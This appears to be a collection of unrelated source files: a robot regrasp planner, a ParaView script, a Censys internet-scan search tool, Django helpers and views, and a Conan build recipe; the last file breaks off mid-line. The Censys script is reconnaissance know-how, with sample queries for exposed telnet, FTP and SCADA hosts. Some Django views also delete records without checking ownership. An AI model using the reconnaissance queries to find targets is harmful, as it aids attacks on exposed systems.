graspCosts, placeCosts):\n '''Calls the C++ routine for performing A* search on the grasp-place table.\n \n - Input graspPlaceTable: Grasp-place table, with values in {-1, 0, 1}, assumed to be C-order of\n type int32.\n - Input placeTypes: Place types, with values in {0, 1, 2} assumed to be C-order of type int32.\n - Input graspCosts: The cost for selecting each grasp. A 1D numpy array of length\n graspPlaceTable.shape[0].\n - Input placeCosts: The cost for selecting each place. 
a 1D numpy array of length\n graspPlaceTable.shape[1].\n - Returns planList: List of pairs, [(grasp, place)_1, ..., (grasp, place)_n]\n - Returns cost: The total plan cost, equal to len(plan) * self.stepCost + goalCosts[goalIdx],\n where goalIdx corresponds to the placement selected.\n '''\n \n # input checking\n \n if placeTypes.size != graspPlaceTable.shape[1] or graspCosts.size != graspPlaceTable.shape[0] \\\n or placeCosts.size != graspPlaceTable.shape[1]:\n raise Exception(\"GraspPlace table has shape {}, but there are {} place types, {} grasp \" + \\\n \"costs, and {} place costs.\".format(graspPlaceTable.shape, placeTypes.size,\n graspCosts.size, placeCosts.size))\n \n graspCosts = ascontiguousarray(graspCosts, dtype = \"float32\")\n placeCosts = ascontiguousarray(placeCosts, dtype = \"float32\")\n \n # call C++ routine \n plan = -1 * ones(2 * self.maxSearchDepth, dtype = \"int32\", order = \"C\") \n cost = c_extensions.SearchGraspPlaceGraph(graspPlaceTable.shape[0], graspPlaceTable.shape[1],\n graspPlaceTable, placeTypes, graspCosts, placeCosts, self.stepCost, self.maxSearchDepth, plan)\n \n # make plan 2D\n planList = []\n for i in xrange(self.maxSearchDepth):\n if plan[2 * i + 0] < 0 or plan[2 * i + 1] < 0: break\n planList.append((plan[2 * i + 0], plan[2 * i + 1]))\n \n # return result\n return planList, cost\n \n def UpdateGraspPlaceTable(self, graspPlaceTable, grasps, graspsNew, graspCosts, graspCostsNew,\n tempPlaces, tempPlacesNew, goalPlaces, goalPlacesNew, placeCosts, tempPlaceCostsNew,\n goalPlaceCostsNew, obstacleCloudAtStart, obstacleCloudAtGoal):\n '''Expands the grasp-place table with new grasp and place samples and checks feasibility of\n each essential unchecked grasp-place combination.\n \n - Input graspPlaceTable: mxn numpy array, where the ith row corresponds to grasp i, the jth\n column corresponds to place j, and the value is 1 if the grasp i is feasible at place j, -1 if\n infeasible, and 0 if unknown.\n - Input grasps: m-element list of grasps (4x4 transforms) corresponding to rows of graspPlaceTable.\n - Input graspsNew: m'-element list of grasps corresponding to grasps to be added.\n - Input graspCosts: m-element numpy array of costs associated with each grasp in grasps.\n - Input graspCostsNew: m'-element numpy array of costs associated with each grasp in newGrasps.\n - Input tempPlaces: List of existing temporary places (4x4 transforms) corresponding to columns\n 1 to 1 + len(tempPlaces) of graspPlaceTable.\n - Input tempPlacesNew: List of temporary places to add as middle columns of graspPlaceTable.\n - Input goalPlaces: List of existing goal places corresponding to the last len(goalPlaces)\n columns of graspPlaceTable. n = 1 + len(goalPlaces) + len(tempPlaces).\n - Input goalPlacesNew: List of goal places to add to graspPlaceTable.\n n' = len(tempPlacesNew) + len(goalPlacesNew).\n - Input placeCosts: n-element array of costs associated with existing places.\n - Input tempPlaceCostsNew: Costs associated with tempPlacesNew.\n - Input goalPlaceCostsNew: Costs associated with goalPlacesNew.\n - Input obstacleCloudAtStart: Point cloud (nx3 numpy array) representing obstacles at the start.\n - Input obstacleCloudAtGoal: Point cloud representing obstacles at all goal places.\n - Returns graspPlaceTable: graspPlaceTable of shape (m+m')x(n+n') augmented with new grasps and\n new places, checked for feasiblilty. 
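Feasibility here means a reachable, collision-free arm configuration exists for both the grasp and its pre-grasp pose, given the corresponding obstacle cloud. 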
\n    - Returns placeTypes: n+n'-element array with the type of each place: 0 at position j means the\n      jth place/column is a start place, 1 is a temporary place, and 2 is a goal place.\n    - Returns grasps: m+m'-element list of grasps corresponding to graspPlaceTable.\n    - Returns graspCosts: m+m'-element list of costs associated with each grasp in grasps.\n    - Returns tempPlaces: List of places at the regrasp area.\n    - Returns goalPlaces: List of places at the goal area.\n    - Returns placeCosts: n+n'-element list of costs associated with each place.\n    - Returns nReachableStart: The number of grasps reachable at the start pose of the object.\n    - Returns nReachableTemp: The number of grasps reachable at temporary placements.\n    - Returns nReachableGoal: The number of grasps reachable at goal placements.\n    '''\n    \n    # Input checking.\n\n
    if len(grasps) != graspPlaceTable.shape[0]:\n      raise Exception(\"Input {} grasps but graspPlaceTable has {} rows.\".format(\\\n        len(grasps), graspPlaceTable.shape[0]))\n    \n    if len(grasps) != graspCosts.size:\n      raise Exception(\"Input {} grasps but have {} grasp costs.\".format(\\\n        len(grasps), graspCosts.size))\n    \n    if len(graspsNew) != graspCostsNew.size:\n      raise Exception(\"Input {} new grasps but have {} new grasp costs.\".format(\\\n        len(graspsNew), graspCostsNew.size))\n    \n    if 1 + len(tempPlaces) + len(goalPlaces) != graspPlaceTable.shape[1]:\n      raise Exception(\"Input {} places but graspPlaceTable has {} columns.\".format(\\\n        1 + len(tempPlaces) + len(goalPlaces), graspPlaceTable.shape[1]))\n    \n    if len(tempPlacesNew) != tempPlaceCostsNew.size:\n      raise Exception(\"Input {} new temp. places but have {} new temp. place costs.\".format(\\\n        len(tempPlacesNew), tempPlaceCostsNew.size))\n    \n    if len(goalPlacesNew) != goalPlaceCostsNew.size:\n      raise Exception(\"Input {} new goal places but have {} new goal costs.\".format(\\\n        len(goalPlacesNew), goalPlaceCostsNew.size))\n    \n    if obstacleCloudAtStart.shape[1] != 3:\n      raise Exception(\"Obstacle cloud at start not 3D.\")\n    \n    if obstacleCloudAtGoal.shape[1] != 3:\n      raise Exception(\"Obstacle cloud at goal not 3D.\")\n    \n    if isnan(graspCosts).any(): raise Exception(\"graspCosts has NaN.\")\n    if isnan(graspCostsNew).any(): raise Exception(\"graspCostsNew has NaN.\")\n    if isnan(placeCosts).any(): raise Exception(\"placeCosts has NaN.\")\n    if isnan(tempPlaceCostsNew).any(): raise Exception(\"tempPlaceCostsNew has NaN.\")\n    if isnan(goalPlaceCostsNew).any(): raise Exception(\"goalPlaceCostsNew has NaN.\") \n    \n
    # Semantics of grasp-place table: ======================\n    # Rows: grasps\n    # Columns: places in order [start, temporary, goal]\n    # Values: (0) not checked, (-1) invalid, and (1) valid\n    # ======================================================\n\n    # Add a row for each new grasp.\n    newRows = zeros((len(graspsNew), graspPlaceTable.shape[1]), dtype = \"int32\", order = \"C\")\n    graspPlaceTable = vstack([graspPlaceTable, newRows])\n    # Add a column for each new temporary place.\n    newColumns = zeros((graspPlaceTable.shape[0], len(tempPlacesNew)), dtype = \"int32\", order = \"C\")\n    graspPlaceTable = hstack([graspPlaceTable[:, :len(tempPlaces) + 1], newColumns,\n      graspPlaceTable[:, len(tempPlaces) + 1:]])\n    # Add a column for each new final place.\n    newColumns = zeros((graspPlaceTable.shape[0], len(goalPlacesNew)), dtype = \"int32\", order = \"C\")\n    graspPlaceTable = hstack([graspPlaceTable, newColumns])\n    \n    # Concatenate old 
and new grasp and place lists.\n placeCosts = concatenate([zeros(1), placeCosts[1:len(tempPlaces) + 1], tempPlaceCostsNew,\n placeCosts[len(tempPlaces) + 1:], goalPlaceCostsNew]) # must be before next 2 lines\n grasps += graspsNew; tempPlaces += tempPlacesNew; goalPlaces += goalPlacesNew\n graspCosts = concatenate([graspCosts, graspCostsNew])\n \n # Record place type for each column: (0) start, (1) temporary, and (2) goal.\n placeTypes = zeros(1 + len(tempPlaces) + len(goalPlaces), dtype = 'int32', order = \"C\")\n placeTypes[1:len(tempPlaces) + 1] = 1\n placeTypes[len(tempPlaces) + 1:] = 2 \n \n # Mark grasps as being valid / invalid.\n \n # find where checks need made\n row, col = nonzero(graspPlaceTable == 0)\n row = reshape(row, (row.size, 1))\n col = reshape(col, (col.size, 1))\n checkIdxs = hstack([row, col])\n \n # find grasp in place frame\n posesStart = []; posesTemp = []; posesGoal = []\n idxsStart = []; idxsTemp = []; idxsGoal = []\n for idx in checkIdxs:\n idx = tuple(idx)\n graspIdx = idx[0]\n placeIdx = idx[1]\n grasp = grasps[graspIdx]\n if placeTypes[placeIdx] == 0:\n posesStart.append(grasp)\n idxsStart.append(idx)\n elif placeTypes[placeIdx] == 1:\n place = tempPlaces[placeIdx - 1]\n posesTemp.append(dot(place, grasp))\n idxsTemp.append(idx)\n else:\n place = goalPlaces[placeIdx - len(tempPlaces) - 1]\n posesGoal.append(dot(place, grasp))\n idxsGoal.append(idx)\n \n # check reachability at start\n reachableStart = self.env.CheckReachability(\n posesStart, self.GetPreGrasps(posesStart), True, obstacleCloudAtStart)\n for i, idx in enumerate(idxsStart):\n graspPlaceTable[idx] = 1 if reachableStart[i] else -1\n nReachableStart = sum(graspPlaceTable[:, 0] > 0)\n if nReachableStart == 0:\n print(\"Found 0 start grasps.\")\n return graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n 0, 0, 0\n \n # check reachability at goal\n reachableGoal = self.env.CheckReachability(\n posesGoal, self.GetPreGrasps(posesGoal), True, obstacleCloudAtGoal)\n for i, idx in enumerate(idxsGoal):\n graspPlaceTable[idx] = 1 if reachableGoal[i] else -1\n nReachableGoal = sum(graspPlaceTable[:, 1 + len(tempPlaces):] > 0)\n if nReachableGoal == 0:\n print(\"Found {} start and 0 goal grasps.\".format(nReachableStart))\n return graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n nReachableStart, 0, 0\n \n # check reachability at temporary\n reachableTemp = self.env.CheckReachability(posesTemp, self.GetPreGrasps(posesTemp), True)\n for i, idx in enumerate(idxsTemp):\n graspPlaceTable[idx] = 1 if reachableTemp[i] else -1\n nReachableTemp = sum(graspPlaceTable[:, 1 : len(tempPlaces) + 1] > 0)\n \n # Return result\n \n print(\"Found {} start, {} temporary, and {} goal grasps.\".format(\n nReachableStart, nReachableTemp, nReachableGoal))\n \n return graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n nReachableStart, nReachableTemp, nReachableGoal","sub_path":"Robot/scripts/geom_pick_place/planner_regrasp.py","file_name":"planner_regrasp.py","file_ext":"py","file_size_in_byte":60327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421641358","text":"\"\"\"\nZhen Lu 2018\nmake video with iso-contour of pressure\n\"\"\"\n#### import the simple module from the paraview\nfrom paraview.simple import *\n#### disable automatic camera reset on 'Show'\nparaview.simple._DisableFirstRenderCameraReset()\n\n# create a new 'OpenFOAMReader'\nswBfoam = 
OpenFOAMReader(FileName='SwB.foam')\nswBfoam.MeshRegions = ['internalMesh']\nswBfoam.CellArrays = ['T', 'p']\nswBfoam.CaseType = 'Decomposed Case'\n\n# get animation scene\nanimationScene1 = GetAnimationScene()\n\n# update animation scene based on data timesteps\nanimationScene1.UpdateAnimationUsingDataTimeSteps()\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n# default ppi in paraview is 96\nrenderView1.ViewSize = [1800, 1800]\n# Turn off the small axes\nrenderView1.OrientationAxesVisibility = 0\n# Set background color as white\nrenderView1.Background = [1.0, 1.0, 1.0]\n\n######################################################################\n\n# create a new 'Clip' Cut the bottom\nclip1 = Clip(Input=swBfoam)\nclip1.ClipType = 'Plane'\n\n# Properties modified on clip1.ClipType\nclip1.ClipType.Origin = [0.0, 0.0, -0.06]\nclip1.ClipType.Normal = [0.0, 0.0, 1.0]\n\n# create a new 'Clip' Cut the head\nclip2 = Clip(Input=clip1)\nclip2.ClipType = 'Plane'\n\n# Properties modified on clip2.ClipType\nclip2.ClipType.Origin = [0.0, 0.0, 0.12]\nclip2.ClipType.Normal = [0.0, 0.0, -1.0]\n\n# create a new 'Clip' Cylinder\nclip3 = Clip(Input=clip2)\nclip3.ClipType = 'Cylinder'\nclip3.InsideOut = 1\n\n# Properties modified on clip3.ClipType\nclip3.ClipType.Axis = [0.0, 0.0, 1.0]\nclip3.ClipType.Radius = 0.04\n\n# make pressure contour\ncontour1 = Contour(Input=clip3)\ncontour1.ContourBy = ['POINTS', 'p']\ncontour1.Isosurfaces = [101290.]\ncontour1.PointMergeMethod = 'Uniform Binning'\n\n######################################################################\n\n# show data in view\ncontour1Display = Show(contour1, renderView1)\n# trace defaults for the display properties.\ncontour1Display.Representation = 'Surface'\ncontour1Display.ColorArrayName = [None, 'T']\ncontour1Display.SetScaleArray = ['POINTS', 'T']\ncontour1Display.ScaleTransferFunction = 'PiecewiseFunction'\ncontour1Display.OpacityArray = ['POINTS', 'T']\ncontour1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# set scalar coloring\nColorBy(contour1Display, ('POINTS', 'T'))\n\n# get color transfer function/color map for 'T'\ntLUT = GetColorTransferFunction('T')\ntLUT.RescaleTransferFunction(298., 2200.)\ntLUT.ApplyPreset('2hot', True)\n\n# create a new 'OpenFOAMReader'\nswBWall = OpenFOAMReader(FileName='SwB.foam')\nswBWall.MeshRegions = ['WALL_TUBE_LOW_OUT', 'WALL_QUARL_IN', 'WALL_TUBE_UP']\nswBWall.CellArrays = []\nswBWall.CaseType = 'Decomposed Case'\n\n# show data in view\nswBWallDisplay = Show(swBWall, renderView1)\n# trace defaults for the display properties.\nswBWallDisplay.Representation = 'Surface'\nswBWallDisplay.ColorArrayName = [None, '']\n\n# set scalar coloring\nColorBy(swBWallDisplay, ('FIELD', 'casePath'))\n\n# Properties modified\nswBWallDisplay.Opacity = 0.2\n\n# get color legend/bar for tLUT in view renderView1\ntLUTColorBar = GetScalarBar(tLUT, renderView1)\n\ntLUTColorBar.WindowLocation = 'UpperLeftCorner'\n# remove up and low range labels with different format\ntLUTColorBar.AddRangeLabels = 0\n\ntLUTColorBar.ScalarBarLength = 0.5\ntLUTColorBar.ScalarBarThickness = 48\n\ntLUTColorBar.UseCustomLabels = 1\ntLUTColorBar.CustomLabels = [300., 600., 900., 1200., 1500., 1800., 2100.]\ntLUTColorBar.AutomaticLabelFormat = 1\n#tLUTColorBar.LabelFormat = '%-#4.0f'\n\ntLUTColorBar.Title = 'T (K)'\ntLUTColorBar.ComponentTitle = ''\ntLUTColorBar.TitleFontSize = 60\ntLUTColorBar.TitleFontFamily = 'Times'\ntLUTColorBar.TitleColor = [0.0, 0.0, 0.0]\n\ntLUTColorBar.LabelFontSize = 
60\ntLUTColorBar.LabelFontFamily = 'Times'\ntLUTColorBar.LabelColor = [0.0, 0.0, 0.0]\n\n# create a new 'Annotate Time Filter'\nannotateTimeFilter1 = AnnotateTimeFilter(Input=clip3)\n\n# Properties modified on annotateTimeFilter1\nannotateTimeFilter1.Format = 'Time: %.4f s'\n\n# Properties modified on annotateTimeFilter1\nannotateTimeFilter1.Shift = -1.4002\n\n# Properties modified on annotateTimeFilter1\nannotateTimeFilter1.Scale = 1.0\n\n# show data in view\nannotateTimeFilter1Display = Show(annotateTimeFilter1, renderView1)\n\n# Properties modified on annotateTimeFilter1Display\nannotateTimeFilter1Display.Color = [0.0, 0.0, 0.0]\n\n# Properties modified on annotateTimeFilter1Display\nannotateTimeFilter1Display.FontSize = 48\n\n# Properties modified on annotateTimeFilter1Display\n#annotateTimeFilter1Display.WindowLocation = 'UpperCenter'\nannotateTimeFilter1Display.WindowLocation = 'LowerRightCorner'\n\n# camera placement for renderView1\nrenderView1.CameraPosition = [-0.08, 0.0, 0.07]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.05]\nrenderView1.CameraViewUp = [0.0, 1.0, 1.0]\nrenderView1.CameraViewAngle = 75\n\n#SaveScreenshot('fig_p.png', \n#        renderView1, \n#        ImageResolution=[1800, 1800], \n#        OverrideColorPalette='WhiteBackground')\n#\n#save animation\nSaveAnimation('vedio_p.png', \n        renderView1,\n        ImageResolution=[1800, 1800],\n        OverrideColorPalette='WhiteBackground',\n        FrameRate=24,\n        FrameWindow=[0, 499])\n","sub_path":"SwB/plot_single/paraviewShaheen/pv_vedio_contour_p.py","file_name":"pv_vedio_contour_p.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"65912367","text":"# -*- coding: utf-8 -*-\r\n# @aplyc1a. Fill in your own username and API key below before use.\r\nimport json\r\nimport time\r\nimport requests\r\nimport pprint\r\n\r\n'''\r\nAccording to the Censys site there are six API endpoints in total: search, view, report,\r\nquery, export and data. Censys rate-limits queries for ordinary users.\r\nThis tool implements only the search endpoint. On the web UI, search offers three modes\r\n(IP / certificates / website), corresponding to\r\nhttps://censys.io/api/v1/search/ipv4\r\nhttps://censys.io/api/v1/search/certificates\r\nhttps://censys.io/api/v1/search/website\r\n\r\nSome supported search keywords:\r\nlocation.country_code: DE\r\nprotocols: (\"23/telnet\" or \"21/ftp\")\r\n80.http.get.headers.server: Apache\r\n80.http.get.status_code: 200\r\n80.http.get.status_code:[400 TO 500]\r\n80.http.get.headers.server:nginx\r\ntags: scada\r\nautonomous_system.description: University\r\nweblogic and location.country_code: CN\r\n23.0.0.0/8 or 8.8.8.0/24\r\n'''\r\n\r\nAPI_URL = \"https://censys.io/api/v1\"\r\nUID = \"\"\r\nSECRET = \"\"\r\n\r\ncolumns = { 'ip' : 'ip', \r\n        'protocols' : 'protocols', \r\n        'country' : 'location.country',\r\n        'city' : 'location.city', \r\n        'country_code' : 'location.country_code',\r\n        'asn' : 'autonomous_system.asn',\r\n        'name' : 'autonomous_system.name',\r\n        'organization' : 'autonomous_system.organization'\r\n}\r\n\r\ndef censys_search(query_key):\r\n    page = 1\r\n    num_retries = 5\r\n    while num_retries > 0:\r\n        data = {\r\n            \"query\": query_key,\r\n            \"page\": page,\r\n            \"fields\": [columns['ip'],columns['protocols'],columns['country'],columns['city'], \r\n                columns['country_code'],columns['asn'],columns['name'],columns['organization']],\r\n            \"flatten\":True\r\n        }\r\n        try:\r\n            res = requests.post(API_URL + \"/search/ipv4\", data=json.dumps(data), auth=(UID, SECRET))\r\n            result = res.json()\r\n            if result['status'] == 'error':\r\n                if \"You have used your full quota for this billing period\" in str(result):\r\n                    print(\"[-]You have used your full quota for this billing period. Please see https://censys.io/account/billing or contact support@censys.io.\")\r\n                    break\r\n            \r\n
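            # Note (editor): each successful POST returns a single page of results; 'page' is\r\n            # advanced at the bottom of the loop, so fetching continues page by page until the\r\n            # API reports an error or the retry budget is exhausted.\r\n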
            #print(result[\"results\"])\r\n            #pprint.pprint(result[\"results\"])\r\n            #print(result[\"metadata\"])\r\n            for i in result[\"results\"]:\r\n                \r\n                #print(i)\r\n                \r\n                print(\"\")\r\n                pprint.pprint(i)\r\n                \r\n                # Print every field of each query result\r\n                #for j in i.keys():\r\n                #    print(\"\\\"%s\\\"\\t\" %(i[j]), end=\" \" )\r\n                #    print(\"\")\r\n                \r\n                # Print only the IP and its protocols\r\n                #print(\"%s %s\" %(i[columns['ip']],i[columns['protocols']]))\r\n            num_retries = 5\r\n            page = page + 1\r\n        except Exception as e:\r\n            print(e)\r\n            num_retries=num_retries-1\r\n\r\nif __name__ == '__main__':\r\n    with open(\"censys-item.txt\", 'r', encoding='utf-8') as rf:\r\n        for line in rf:\r\n            print(\"[censys-Query] => \\\"%s\\\"\" %line.strip('\\n').strip('\\r'))\r\n            censys_search(line.strip('\\n').strip('\\r'))\r\n            print(\"-\"*80)\r\n            #time.sleep(1)\r\n","sub_path":"0x01 信息收集/info-censys.py","file_name":"info-censys.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"200686236","text":"from django.http.request import HttpRequest\nfrom django.db.models.query import EmptyQuerySet\nfrom rest_framework.exceptions import PermissionDenied\n\nfrom .models import AnonymousUserModel\n\n\ndef get_anonymous_identify_model_id(request: HttpRequest) -> str:\n    return get_anonymous_identify_model(request).id\n\n\ndef get_anonymous_identify_model(request: HttpRequest) -> AnonymousUserModel:\n    ''' The user ID instance is returned. If the user is not registered,\n    the identifier must be specified in the path parameters.\n    '''\n\n    if request.user.is_authenticated:\n        object, created = AnonymousUserModel.objects.get_or_create(\n            user=request.user)\n        return object\n\n    identifier = request.GET.get('identifier')\n\n    if identifier:\n        object, created = AnonymousUserModel.objects.get_or_create(\n            identifier=identifier)\n    else:\n        raise PermissionDenied(\n            detail='Please add AnonymousUserID to URL parameters',\n            code=410)\n\n    return object\n\n\ndef build_survey_tree_by_answers(queryset: EmptyQuerySet) -> dict:\n    ''' Build tree like this:\n\n        survey:\n            question:\n                answer\n            question:\n                answer\n    '''\n\n    surveys = {}\n\n    for answer in queryset:\n        _dict_question = {\n            'text': answer.question.text,\n        }\n\n        if answer.text:\n            _dict_question['answer_text'] = answer.text\n\n        list_choices_user = []\n        for selected in answer.selected_choices.all():\n            list_choices_user.append(selected.choice_text)\n\n        if list_choices_user:\n            _dict_question['choices'] = list_choices_user\n\n        survey = answer.question.survey\n\n        try:\n            _tmp = surveys['%d' % survey.id]['questions']\n            _tmp.append(_dict_question)\n        except KeyError:\n            surveys['%d' % survey.id] = {\n                'name': survey.name,\n                'description': survey.description,\n                'info': survey.dates_info,\n                'questions': [_dict_question]\n            }\n\n    return surveys","sub_path":"project/api/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"632669952","text":"import os\n\n\nfrom conans import tools, python_requires\npyreq = python_requires(\"pyreq/1.0.0@tdelame/stable\")\n\nclass LZMA(pyreq.BaseConanFile):\n    description = \"LZMA library is part of XZ Utils\"\n    url = \"https://tukaani.org\"\n    license = \"Public Domain\"\n    \n    name = \"lzma\"\n    version = \"5.2.4\"\n    settings = \"os\"\n\n    def config_options(self):\n        \"\"\"Executed before the actual 
assignment of options. Use it to configure or constrain\n the available options in a package. You can read values of self.settings but you cannot\n read values of self.options.\"\"\" \n if self.settings.os != \"Linux\":\n raise RuntimeError(\"lzma recipe is not available yet for your OS\")\n\n def source(self):\n \"\"\"Retrieve source code.\"\"\"\n directory = \"xz-{}\".format(self.version)\n self.download(\"https://tukaani.org/xz\", directory=directory)\n\n def build(self):\n \"\"\"Build the elements to package.\"\"\"\n arguments = [\n '--disable-xz', '--disable-xzdec', '--disable-lzmadec',\n '--disable-lzmainfo', '--disable-scripts', '--disable-doc']\n self.build_autotools(arguments)\n\n def package_info(self):\n \"\"\"Edit package info.\"\"\"\n super(LZMA, self).package_info()\n if not self.options.shared:\n self.cpp_info.defines.append('LZMA_API_STATIC')\n self.cpp_info.libs = [\"lzma\"]\n ","sub_path":"lzma/lzma-5.2.4.py","file_name":"lzma-5.2.4.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577584505","text":"def collatz(n, cache={}):\n n_org = n\n cnt = 1\n while n != 1:\n cnt += 1\n\n if n in cache:\n cnt += cache[n] - 1\n n = 1\n\n elif n % 2 == 0:\n n = int(n / 2)\n\n else:\n n = 3 * n + 1\n cache[n_org] = cnt - 1\n return cnt\n\n\nmax_i = 0\nmax_n = 0\nfor i in range(500_000, 1_000_000): # since n -> n/2, we know doubling a value extends it\n n = collatz(i)\n if n > max_n:\n max_i, max_n = i, n\nprint(max_i)\n","sub_path":"11-20/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479243439","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth import login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom accounts.models import Accounts, Advertisements\nfrom organisation.models import Organisations\nfrom teams.models import Teams\nfrom sports.models import Sports\nfrom accounts.accountFunctions import *\nimport datetime\nfrom .filters import AdvertisementsOwnFilter\n\nlogin_path = \"/accounts/login\"\ndef signup_view(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n newAccount = Accounts(accountName = request.POST['username'], userInstance = user) #This creates the Account model, has extended fields to the User model\n newAccount.save()\n login(request, user)\n return redirect('accounts:accountEdit',request.POST['username'] )\n else:\n form = UserCreationForm()\n return render(request, 'accounts/signup.html', { 'form': form })\n\ndef login_view(request):\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n # log the user in\n user = form.get_user()\n login(request, user)\n if 'next' in request.POST:\n return redirect(request.POST.get('next'))\n else:\n return redirect('articles:list')\n else:\n form = AuthenticationForm()\n return render(request, 'accounts/login.html', { 'form': form })\n\n@login_required(login_url=\"/accounts/login\")\ndef logout_view(request):\n #if request.method == 'POST':\n logout(request)\n return redirect('articles:list')\n\n@login_required(login_url=login_path)\ndef account(request, accountName):\n try:\n accountInstance = Accounts.objects.get(accountName = accountName)\n except:\n return 
render(request, 'accounts/noAccount.html')\n\n    accountInfo = {'name':accountName,'accountID':accountInstance.id, 'accountDescription':accountInstance.description,\n    'gender':accountInstance.gender, 'accountInstance':accountInstance}\n    return render(request, 'accounts/account.html', accountInfo)\n\n\n@login_required(login_url=login_path)\ndef accountEdit(request, accountName):\n    #try:\n    genderList = ['Male', 'Female', 'Other']\n    accountInstance = Accounts.objects.get(accountName = accountName)\n    accountInfo = {'name':accountName,'accountID':accountInstance.id, 'accountDescription':accountInstance.description,\n    'gender':accountInstance.gender, 'accountInstance':accountInstance,'genderList':genderList}\n\n    #except:\n        #return render(request, 'accounts/noAccount.html')\n    return render(request, 'accounts/edit.html', accountInfo)\n\n
@login_required(login_url=login_path)\ndef accountEditMedium(request, accountName):\n    if request.user.username == accountName:\n    #this method is for when you are on the edit page, and this updates the database\n\n        if request.method == 'POST':\n\n            changingAccount = Accounts.objects.get(accountName = accountName)\n\n            changingAccount.first_name = request.POST['First_Name']\n            changingAccount.last_name = request.POST['Last_Name']\n            changingAccount.phone_number = request.POST['Phone']\n            changingAccount.gender = request.POST['Gender']\n            changingAccount.email = request.POST['Email']\n            changingAccount.description = request.POST['Description']\n            changingAccount.save()\n\n\n            updateAccountAds(changingAccount)\n            updateAccountTeams(changingAccount)\n            \n    return redirect('accounts:account', accountName)\n\n\n
@login_required(login_url=login_path)\ndef accountAdvertisements(request, accountName):\n    advertisementList = Advertisements.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n    print(\"sport\")\n    print(advertisementList[0].sport)\n\n    myFilter = AdvertisementsOwnFilter(request.GET, queryset = advertisementList)\n    advertisementList = myFilter.qs\n    print(\"my filter\")\n    print(myFilter)\n\n    return render(request, 'accounts/viewOwnAdvertisements.html', {'advertisementList':advertisementList, 'accountName':accountName, 'myFilter':myFilter})\n\n@login_required(login_url=login_path)\ndef accountTeams(request, accountName):\n\n    teamsList = Teams.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n    return render(request, 'accounts/viewOwnTeams.html', {'teamsList':teamsList, 'accountName':accountName})\n\n@login_required(login_url=login_path)\ndef accountOrganisations(request, accountName):\n\n    orgsList = Organisations.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n    return render(request, 'accounts/viewOwnOrganisations.html', {'orgsList':orgsList, 'accountName':accountName})\n\n@login_required(login_url=login_path)\ndef accountOrganisationsDelete(request, accountName, orgID):\n\n    Organisations.objects.get(id=orgID).delete()\n\n    return redirect('accounts:accountOrganisations', accountName)\n\n\n
@login_required(login_url=login_path)\ndef accountOrganisationsEdit(request, accountName):\n\n    orgsList = Organisations.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n    return render(request, 'accounts/viewOwnOrganisations.html', {'orgsList':orgsList, 'accountName':accountName})\n\n\n@login_required(login_url=login_path)\ndef accountTeamsEdit(request, 
accountName, teamID):\n\n sportsList = Sports.objects.all()\n team = Teams.objects.get(id = teamID)\n startHour = converTimeToClockTime(team.startTimeRange.hour)\n startMinute = converTimeToClockTime(team.startTimeRange.minute)\n endHour = converTimeToClockTime(team.endTimeRange.hour)\n endMinute = converTimeToClockTime(team.endTimeRange.minute)\n return render(request, 'accounts/editTeam.html', {'team': team, 'sportsList':sportsList, 'accountName':accountName,\n 'startHour':startHour, 'startMinute':startMinute, 'endHour':endHour, 'endMinute':endMinute,\n 'listOfDaysInWeek':listOfDaysInWeek, 'listOfGenderOptions':listOfGenderOptions})\n\n@login_required(login_url=login_path)\ndef accountTeamsEditMedium(request, accountName, teamID):\n if request.user.username == Teams.objects.get(id=teamID).owner.accountName:\n team = Teams.objects.get(id = teamID)\n\n nameOfOrg = request.POST['organisationName']\n postName = request.POST['fname']\n firstTime = request.POST['start-time'].split(':',2)\n lastTime = request.POST['end-time'].split(':',2)\n sport = request.POST['Sport']\n team.teamName = postName\n team.day = request.POST['Days']\n team.location = request.POST['teamLocation']\n team.lengthOfGame = request.POST['lengthOfGame']\n team.startTimeRange = datetime.time(int(firstTime[0]), int(firstTime[1]), 0)\n team.endTimeRange = datetime.time(int(lastTime[0]), int(lastTime[1]), 0)\n team.owner = Accounts.objects.get(accountName = request.user.username)\n team.sport = sport\n team.currentNumPlayers = request.POST['currentPlayers']\n team.lookingNumPlayers = request.POST['lookingPlayers']\n team.lookingGenderPlayers = request.POST['genderRequirements']\n team.notes = request.POST['Notes']\n team.save()\n print(\"team edited successfully\")\n else:\n print(\"team not edited successfully\")\n return redirect('accounts:accountTeams', accountName)\n\n@login_required(login_url=login_path)\ndef accountTeamsDelete(request, accountName, teamID):\n\n team = Teams.objects.get(id = teamID)\n teamsList = Teams.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n return render(request, 'accounts/deleteTeam.html', {'teamsList':teamsList, 'team':team, 'accountName':accountName})\n\n@login_required(login_url=login_path)\ndef accountTeamsDeleteMedium(request, accountName, teamID):\n if request.user.username 